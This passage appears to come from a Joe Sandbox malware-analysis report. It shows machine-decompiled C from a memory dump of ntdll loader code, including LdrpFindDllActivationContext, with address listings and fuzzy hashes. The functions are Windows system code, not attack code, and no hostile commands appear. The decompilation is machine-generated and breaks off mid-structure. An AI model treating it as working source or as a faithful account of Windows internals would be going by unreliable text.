				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x36bbbd28);
				_push(E36B2AD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x36bdb370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E36AE8120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E36AE80BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E36AE8009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E36B28F40( &_v244, 0, "true");
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L36AE53C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E36AE6055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E36AE6074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E36AE6179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E36B1B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E36AE63CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L36AF2330(_t268, _t377 + 0x2c);
										E36BB4407(_t377);
										E36AF24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E36AE64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x36bd6644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E36AF5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E36B246E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E36B28F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E36AE6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E36AE6D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E36AE6E00;
											if(_t342 == E36AE6E00) {
												E36AE6E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E36AE61C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push("true");
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E36B243A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L36AF2330(_t288, _t377 + 0x2c);
														E36BB4407(_t377);
														E36AF24D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E36AE7290;
											if(_t342 != E36AE7290) {
												__eflags = _t342 - E36AE5570;
												if(_t342 != E36AE5570) {
													 *0x36bd91e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E36AE5570( &_v216);
												goto L33;
											}
											E36AE7290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E36AE6970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E36ADBE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E36AE6929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E36AE6B70) {
											__eflags = _t384 - E36AE56E0;
											if(_t384 != E36AE56E0) {
												 *0x36bd91e0();
												 *_t384();
											} else {
												E36AE56E0(_t361);
											}
										} else {
											E36AE6B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E36AE7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L36AF2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E36AF24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E36B28F40( &_v216, 0, "true");
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E36AE4A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E36B229A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}

0x36ae58e0
0x36ae58e0
0x36ae58e0
0x36ae58e5
0x36ae58e7
0x36ae58ec
0x36ae58f7
0x36ae58f8
0x36ae58fe
0x36ae5903
0x36ae5906
0x36ae5908
0x36ae590b
0x36ae590c
0x36ae590d
0x36ae590e
0x36ae5912
0x36ae5918
0x36ae591b
0x36ae591e
0x36ae5928
0x36ae592e
0x36ae5935
0x36ae593c
0x36ae5943
0x36ae594a
0x36ae5951
0x36ae5958
0x36ae595f
0x36ae5966
0x36ae5970
0x36ae597a
0x36ae5985
0x36ae598b
0x36ae5998
0x36ae599d
0x36ae59a3
0x36ae59a8
0x36ae59b0
0x36ae59b2
0x36ae59b8
0x36ae59b8
0x36ae59c8
0x36ae59cd
0x36ae59d0
0x36ae59d7
0x36ae59e5
0x36ae59ea
0x36ae59f8
0x36b40745
0x36b4074f
0x36b4074f
0x36b40756
0x36ae5a25
0x36ae5a25
0x36ae5a2c
0x36ae5a31
0x36ae5a38
0x36ae5fef
0x36ae5fef
0x36ae5ff6
0x36ae5ffb
0x36ae6002
0x36ae6007
0x36ae6007
0x36ae6009
0x36ae600f
0x36ae6017
0x36ae601c
0x36ae601c
0x36ae5b95
0x36ae5b99
0x36ae5f2d
0x36ae5f32
0x36ae5f36
0x36ae5f36
0x36ae5ba1
0x36ae5fcf
0x36ae5fcf
0x36ae5fd4
0x00000000
0x00000000
0x36ae5fd6
0x36ae5fd6
0x36ae5fd9
0x36b407dc
0x36b407e3
0x36b407e5
0x36b407ea
0x00000000
0x36b407ea
0x36ae5fdf
0x36ae5fe2
0x00000000
0x00000000
0x36ae5fe8
0x00000000
0x36ae5ba7
0x36ae5ba9
0x36ae5e71
0x36ae5e77
0x36ae5e79
0x36ae5bb4
0x36ae5bba
0x36b40836
0x36b4083a
0x36b40841
0x36b40847
0x36b40847
0x36ae5bd4
0x36ae5bda
0x36ae5be0
0x36ae5be7
0x00000000
0x36ae5bed
0x36ae5bf3
0x36ae5ae0
0x36ae5ae0
0x36ae5aec
0x36ae5aef
0x36ae5af2
0x36ae5af5
0x36ae5af8
0x36ae5afb
0x36ae5b07
0x36ae5f69
0x36ae5f73
0x36ae5f8b
0x36ae5f90
0x36ae5f92
0x36b4077f
0x36b4077f
0x36b40789
0x36ae5b43
0x36ae5b43
0x36ae5b49
0x36ae5b53
0x36ae5b5a
0x36ae5b5d
0x36ae5b66
0x36ae5b67
0x36ae5b6d
0x36ae5b6e
0x36ae5b74
0x36ae5b7a
0x36ae5b7b
0x36ae5b80
0x36ae5b86
0x36ae5b8f
0x00000000
0x00000000
0x00000000
0x36ae5b8f
0x36ae5f98
0x36ae5f98
0x36ae5f9e
0x36ae5fa0
0x36ae5fa7
0x36ae5fae
0x36ae5fb1
0x00000000
0x36ae5fb1
0x36ae5b13
0x00000000
0x00000000
0x36ae5b19
0x36ae5b30
0x36ae5b35
0x36ae5b3b
0x36ae5b41
0x00000000
0x36ae5b41
0x36ae5bf9
0x36ae5bfe
0x36ae5e84
0x36ae5e8d
0x36ae5e93
0x36ae5ea1
0x36ae5ea9
0x36ae5eb4
0x36ae5eb9
0x36ae5ec0
0x36ae5ec6
0x36ae5ec7
0x36ae5ed0
0x36ae5ed1
0x36ae5ed2
0x36ae5ed8
0x36ae5f15
0x36ae5d52
0x36ae5d52
0x36ae5d59
0x36ae5d60
0x36b40909
0x36b40909
0x36ae5d6d
0x36ae5d74
0x36ae5d81
0x36ae5d86
0x36ae5d8d
0x36ae5d9e
0x36b40955
0x36b40958
0x36b4095e
0x36b40960
0x36b40963
0x36b40969
0x36b40969
0x36b4096f
0x36b4096f
0x36b4096f
0x36b4096f
0x36b40971
0x36b40977
0x36b40979
0x36b40989
0x36b40992
0x36b40998
0x36b4099c
0x36b4099e
0x36b409a4
0x36b409a6
0x36b409ac
0x36b409ac
0x36b409b4
0x36b409b4
0x36b409bc
0x36b409c6
0x36b409ce
0x36b409cf
0x36b409d1
0x36b409d4
0x36ae5da4
0x36ae5da4
0x36ae5dac
0x36ae5f0b
0x36ae5f0b
0x36ae5db8
0x36b409e2
0x36b409e9
0x36b409ef
0x36b409ef
0x36ae5dbe
0x36ae5dc1
0x36ae5dc7
0x36ae5dc9
0x36ae5dcc
0x36ae5dd2
0x36ae5de0
0x36ae5de0
0x36ae5de2
0x36ae5de8
0x36ae5dea
0x36ae5df0
0x36ae5df3
0x36ae5e00
0x00000000
0x00000000
0x36ae5e08
0x36ae5eec
0x36ae5eef
0x36b409f9
0x36b40a00
0x00000000
0x00000000
0x36b40a06
0x36ae5ef7
0x36ae5f00
0x36ae5e29
0x36ae5e29
0x36ae5e2c
0x36ae5e34
0x36ae5e38
0x36ae5e3a
0x36ae5e40
0x36ae5e42
0x36ae5e4e
0x00000000
0x36ae5e58
0x36ae5e58
0x36ae5e5e
0x36ae5e66
0x00000000
0x00000000
0x00000000
0x36ae5e6c
0x36ae5e4e
0x36ae5e0e
0x36ae5e0e
0x36ae5e21
0x36ae5e23
0x00000000
0x36ae5e23
0x36ae5de0
0x00000000
0x36ae5d9e
0x36ae5eda
0x36ae5ee0
0x36ae5f53
0x36ae5f59
0x36ae602d
0x36ae6033
0x36ae6035
0x00000000
0x36ae6035
0x36ae5f5f
0x00000000
0x36ae5f5f
0x36ae5ee2
0x00000000
0x36ae5ee2
0x36ae5c04
0x36ae5c0a
0x36ae5c0b
0x36ae5c11
0x36ae5c1a
0x00000000
0x00000000
0x36ae5c24
0x36ae6047
0x36ae604c
0x36ae604c
0x36ae5c2a
0x36ae5c30
0x36ae5c3a
0x36ae5c40
0x36ae5c4c
0x36ae5c52
0x36ae5c5f
0x36ae5c68
0x36ae5c71
0x36ae5c7a
0x36ae5c7d
0x36ae5c85
0x36ae5c9e
0x36ae5ca1
0x36ae5ca7
0x36ae5cad
0x36ae5cba
0x36b4087c
0x36ae5cc0
0x36ae5cc0
0x36ae5cc0
0x36ae5cc4
0x36b40886
0x36b40889
0x36b40889
0x36ae5cd1
0x36b40897
0x36b40897
0x36ae5cf0
0x36b408a2
0x36b408a2
0x36ae5cf6
0x36ae5cfc
0x36ae5d09
0x36b408ae
0x36b408ae
0x36ae5d0f
0x36ae5d15
0x36ae5d22
0x36b408ba
0x36b408ba
0x36ae5d22
0x36ae5d28
0x36ae5d2f
0x36ae5d37
0x36ae5d39
0x36ae5d40
0x36ae5d47
0x36ae5f41
0x36ae5f47
0x36ae5fc2
0x36ae5fc8
0x36ae5f49
0x36ae5f49
0x36ae5f49
0x36ae5d4d
0x36ae5d4d
0x36ae5d4d
0x00000000
0x36ae5d47
0x36ae5be7
0x36ae5e7f
0x36ae5baf
0x00000000
0x36ae5baf
0x36ae5ba1
0x36ae5a46
0x36ae5a4b
0x36ae5a52
0x36ae5a5f
0x36ae5a64
0x36ae5a6b
0x36ae5a71
0x36ae5a76
0x36b40772
0x36ae6068
0x36ae6073
0x36ae6073
0x36ae5a7c
0x36ae5a82
0x36ae5a88
0x36ae5a8e
0x36ae5a92
0x36ae5a95
0x36ae5a9c
0x36ae5aa3
0x36ae5ab6
0x36ae5abb
0x36ae5abe
0x36ae5ac5
0x36ae5ace
0x36ae5ad1
0x36ae5ad3
0x00000000
0x36ae5ad3
0x36ae59fe
0x36ae5a01
0x36ae5a07
0x36ae5a08
0x36ae5a0d
0x36ae5a15
0x00000000
0x00000000
0x36ae5a1b
0x36ae5a1e
0x00000000

Strings

@, xrefs: 36B408AE

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 806105bee0231bf1d719ca11a0de3c80f8ae16226682a54f8c195327ee205626
Instruction ID: 940a8b9455095e20635429fc44fa6698664d1bc72d5a4730ce01a421955155b9
Opcode Fuzzy Hash: 806105bee0231bf1d719ca11a0de3c80f8ae16226682a54f8c195327ee205626
Instruction Fuzzy Hash: 05322474D14269DFEB21CF64C984BD9BBB0BF08304F1041E9D949AB241EB769A84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 36B14B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E36B14B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x36bdb370 ^ _t114;
				_v8 =  *0x36bdb370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E36B24B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E36B38A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E36B38A60(_t99, _t107);
							_t99 = _v96;
						}
						_t72 = _t111 + 0x18;
						if(_t99 < _t111 + 0x18) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x36bd65e4; // 0x75ecf0e0
															 *0x36bd91e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E36AE26A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x36bd37c0 & 0x00000003) != 0) {
																		E36B5E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x36bd37c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x36bd37c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E36B5E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}

0x36b14b79
0x36b14b86
0x36b14b88
0x36b14b8e
0x36b14b90
0x36b14b93
0x36b14b97
0x36b14c27
0x36b14c35
0x36b14ba7
0x36b14ba7
0x36b14baa
0x36b14bac
0x36b14bb2
0x36b14bb2
0x36b14bb5
0x36b14bbc
0x36b5330f
0x36b53316
0x36b53317
0x36b5331e
0x36b53321
0x36b53324
0x36b53327
0x36b5332a
0x36b53331
0x36b53334
0x36b53339
0x36b5333e
0x36b5333e
0x36b14bca
0x36b53344
0x36b5334b
0x36b5334c
0x36b53353
0x36b53356
0x36b5335d
0x36b53360
0x36b53363
0x36b5336a
0x36b5336d
0x36b53372
0x36b53372
0x36b14bd0
0x36b14bd5
0x36b14c36
0x36b14c36
0x00000000
0x36b14bd7
0x36b14bd7
0x36b14bd7
0x36b14bdf
0x00000000
0x36b14be1
0x36b14be3
0x36b14bec
0x36b14bef
0x36b14bf0
0x36b14bf9
0x36b14bfd
0x36b14bff
0x36b14c04
0x36b14c06
0x36b14c07
0x36b14c0a
0x36b14c0c
0x36b14c0f
0x36b14c1a
0x36b14c1c
0x36b14c21
0x36b5337a
0x36b5337a
0x36b5337d
0x36b5337d
0x36b53384
0x00000000
0x36b53386
0x36b53386
0x36b5338b
0x36b533b2
0x36b533b5
0x36b533b9
0x36b533be
0x36b533f7
0x36b533f7
0x36b14c76
0x36b14c84
0x36b14c8c
0x36b14c90
0x36b14ca9
0x36b14ca9
0x36b14cae
0x36b14ce4
0x36b14cee
0x36b14cf3
0x36b14cf3
0x36b14ce6
0x36b14ce6
0x36b14cb2
0x36b53463
0x36b5347b
0x36b53480
0x36b5348a
0x36b53490
0x36b53490
0x36b5348a
0x36b14cbe
0x36b14c92
0x36b14c98
0x36b14cc5
0x00000000
0x36b53423
0x36b53429
0x00000000
0x36b5342f
0x00000000
0x36b5342f
0x36b53429
0x00000000
0x36b14c9a
0x36b14c9a
0x36b14ca1
0x36b53434
0x36b53435
0x36b5344f
0x36b53454
0x36b53454
0x36b14ca7
0x36b14ca7
0x00000000
0x36b14c98
0x36b53391
0x36b53398
0x36b5339c
0x36b533a2
0x00000000
0x36b533a2
0x36b5338b
0x00000000
0x36b533a7
0x36b533a7
0x36b533a9
0x36b533ad
0x36b14c21
0x36b14c1a
0x36b14c04
0x00000000
0x36b14bfd
0x36b14bdf
0x00000000
0x36b14bd5
0x00000000
0x36b14bac
0x00000000

Strings

0, xrefs: 36B14BE3
Flst, xrefs: 36B14BB6

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: aedad9861891edcc9b50a8983e461bcda92d08db0cb5fc8fbcf9db84741ff28e
Instruction ID: b2b344cd396e0bd31c4a47e2ad1b5a93d26122f702374986c235e6a8467b27a6
Opcode Fuzzy Hash: aedad9861891edcc9b50a8983e461bcda92d08db0cb5fc8fbcf9db84741ff28e
Instruction Fuzzy Hash: 3551B0B5E10228DFEB20CF99C884B8DFBF4EF44795F259029D1099B240E7709989CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 36ADDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

